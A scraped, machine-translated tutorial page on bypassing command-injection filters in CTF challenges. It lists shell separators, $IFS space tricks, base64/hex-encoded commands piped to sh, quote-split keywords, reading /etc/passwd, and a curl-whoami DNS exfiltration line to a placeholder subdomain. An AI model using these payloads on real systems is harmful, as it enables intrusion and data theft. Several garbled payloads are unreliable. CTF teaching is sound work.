Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

What are the ways to bypass command execution in CTF

2025-04-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

Editor to share with you what the CTF command implementation bypass ways, I believe that most people do not know much, so share this article for your reference, I hope you will learn a lot after reading this article, let's go to know it!

For reference, study and use only

0x01: pipe symbol

When using the linux command, we can execute multiple commands per line or conditionally execute the next command. Let's explain the use of the semicolon & & and &, | and | | of the linux command.

Semicolon usage

Method: command1; command2

Separate each command with the; sign, and each command is executed in the order from left to right, regardless of whether it fails or not, all commands are executed.

"|" pipe symbol usage

The output of the previous command as the argument to the next command. Inside ctf: ping 127.0.0.1 | ls (only execute ls, not the previous one)

Method: command1 | command

The pipe character "|" provided by Linux separates the two commands, and the output of the command on the left side of the pipe character is used as the input of the command on the right side of the pipe character. Continuous use of pipes means that the output of the first command is used as the input of the second command, the output of the second command is used as the input of the third command, and so on.

Take advantage of a pipe:

# rpm-qa | grep licq

This command creates a pipe with a pipe character "|". The pipeline lists RPM packages with licq characters by taking the output of the rpm-qa command (including all installed RPM packages in the system) as input to the grep command.

Take advantage of multiple pipes:

# cat / etc/passwd | grep / bin/bash | wc-l

This command uses two pipes, using the first pipe to send the output of the cat command (showing the contents of the passwd file) to the grep command, the grep command to find out all the lines containing "/ bin / bash"; the second pipe sends the output of grep to the wc command, and the wc command counts the number of lines in the input. The function of this command is to find out how many users in the system are using bash.

The usage of "&" symbol

Usage ping 127.0.0.1 & ls in ctf (execute ls first and then ping)

& put it after the startup parameter to set this process as a background process

Method: command1 &

By default, the process is the foreground process, so the Shell is occupied, and we cannot do other operations. For those processes that do not interact, we often want to start them in the background. We can add a'&'to the startup parameters to achieve this purpose.

The usage of "&" symbol

Usage ping 127.0.0.1 & & ls in ctf (execute ls only if the ping command is correct. If ping 1 & & ls ls will not execute)

When shell executes a command, it returns a return value, which is saved in the shell variable $? Medium. When $? = = 0, the execution is successful; when $? = = 1 (I think it is a non-zero number, the return value is between 0 and 255), the execution failed.

Sometimes the next command depends on whether the previous command was executed successfully. For example, execute another command after the successful execution of one command, or execute another command after the execution of another command fails. Shell provides & & and | | to control the execution of commands. Shell will control the execution of subsequent commands based on the return value of the previous command.

The syntax format is as follows:

Command1 & & command2 [& & command3.]

The & & connection is used between commands to realize the function of logic and.

Only if the command on the left of & & returns true (the command return value $? = = 0), the command on the right of & & will be executed.

As long as a command returns false (the command returns a value of $? = = 1), the subsequent command will not be executed.

"| |" symbol usage

And & & on the contrary, the left side is false to execute order two.

The function of logical OR

The syntax format is as follows:

Command1 | | command2 [| | command3.]

Use "|" to connect between commands to achieve the function of logic or.

Only if the command on the left returns false (the return value of the command $? = = 1), the command on the right will be executed. This is the same as the logic or syntax function in c language, that is, to implement short-circuit logic or operation.

As long as a command returns true (the command returns a value of $? = = 0), the subsequent command will not be executed. -stop execution until you return to the real place.

For example, the ping command determines the surviving host

Ping-c 1-w 1 192.168.1.1 & > / dev/null & & result=0 | | result=1 if ["$result" = = 0]; then echo "192.168.1.1 is UP!" Else echo "192.168.2.1 is DOWN!" Fi

Note that & > write together.

0x02: some bypass ways to bypass spaces under linux

{cat,flag.txt} cat$ {IFS} flag.txtcat$IFS$9flag.txtcat key.php

Inline implementation practices:

Payload:cat$IFS$ 1`ls`

Using inline execution will take the output in ``as the input of the previous command, and when we enter the above payload, it is equivalent to cat falg.php;cat index.php

Use DNS pipeline to resolve:

Here is an online URL that can be directly assigned to an exploiting URL: admin.dnslog.link registers an account and assigns a subdomain name that can be used.

| | curl `whoami`.http://xxxx.xxx( subdomain name) |

In this way, you will see the rebound result in the use of the URL. (there is no demonstration here, the account number has been forgotten. ) explain\ whoami\ because `backquotes are special symbols for executing commands under linux. For more information, please see:

Http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ

Convert a network address to a numeric address

There is another representation of a network address, which is that a numeric address such as 127.0.0.1 can be converted to 2130706433.

Can be accessed directly

Http://2130706433

Or http://0x7F000001.

So we can get around it. For ip filtering, here is a conversion URL:

Http://www.msxindl.com/tools/ip/ip_num.asp

Give permissions by viewing the permissions of the file chmod + 777

Lumped s'- la

C'h'm'o'd + 777 / filename

Command in place of cat

Cat: displays the content from the first line and outputs all the content

Tac: displays the content in reverse order from the last line and outputs all the content

More: the actual file content of one page according to the size of the window

Less: similar to more, but with the advantage of turning the page forward and searching for characters

Head: only the first few lines are displayed

Tail: show only the last few lines

Nl: similar to cat-n, output line number when displayed

Tailf: similar to tail-f

Sort%20/flag reads the file

Dir to view the current directory file

Linux fancy reading file content

Ps: the goal is to get the content of flag.txt

Static-sh reads the file:

Static-sh. / flag.txt

# output result:

. / flag.txt: line 1: flag {this_is_a_test}: not found

Paste reads the file:

Paste. / flag.txt / etc/passwd

# output result:

Flag {this_is_a_test}

Root:x:0:0:root:/root:/bin/bash

Daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Bin:x:2:2:bin:/bin:/usr/sbin/nologin

Sys:x:3:3:sys:/dev:/usr/sbin/nologin

Sync:x:4:65534:sync:/bin:/bin/sync

Diff reads the file:

Diff. / flag.txt / etc/passwd

# output result:

1c1,45

< flag{this_is_a_test}\ No newline at end of file--->

Root:x:0:0:root:/root:/bin/bash > daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin > bin:x:2:2:bin:/bin:/usr/sbin/nologin > sys:x:3:3:sys:/dev:/usr/sbin/nologin > sync:x:4:65534:sync:/bin:/bin/sync

Od reads files

Od-a. / flag.txt

# output result:

0000000 f l a g {t h i s _ i s _ a _ t0000020 e s t} 0000024

Bzmore reads the file:

Bzmore. / flag.txt

Bzless reads the file:

Bzless. / flag.txtecho `bzless. / room.txt`

# output result:

->. / flag.txt key.txt

Wget operation for target reading

Wget url-P path

Some command delimiters

In linux:% 0a,% 0d,;, &, |, & &, | |

In windows:% 0a, &, |, (a magical role as a command delimiter in a .bat file)

Filter the bash and use sh.

Echo$IFS$1Y2F0IGZsYWcucGhw | base64 $IFS$1-d | sh

Splice flag 1 * a * ag.php * cat $axib.

There is such a filtering method, which we cannot bypass with the above method, but we only need to change the order: 1 IFS$1 payload ("/. * f.*l.*a.*g.*/", $ip) {die ("fxck your flag!")) {die ("fxck your flag!");

Coding bypass

Base64:

Echo YWJjZGU= | base64-d / / print out abcde

Echo Y2F0IGZhbGcucGhw | base64-d | bash / / cat flag.php

Echo Y2F0IGZhbGcucGhw | base64-d | sh / / cat flag.php

Hex coding bypass:

Echo 63617420666c61672e706870 | xxd-r-p | bash / / cat flag.ph

Unicode coding

$(printf "\ 154163") / / ls

$(printf "\ x63\ x61\ x74\ x20\ x66\ x6c\ x61\ x67\ x2e\ x70\ x68\ x70") / / cat flag.php

Keywords can also be bypassed with single quotes and backslashes, such as cat fl''ag cat fl\ ag

To sum up, payload1;a=ag.php;b=fl;cat$IFS$1$ bachela and cat$IFS$ 1`ls`

Get the flag to view the source code.

The above is all the contents of this article entitled "what are the ways to bypass command execution in CTF?" Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report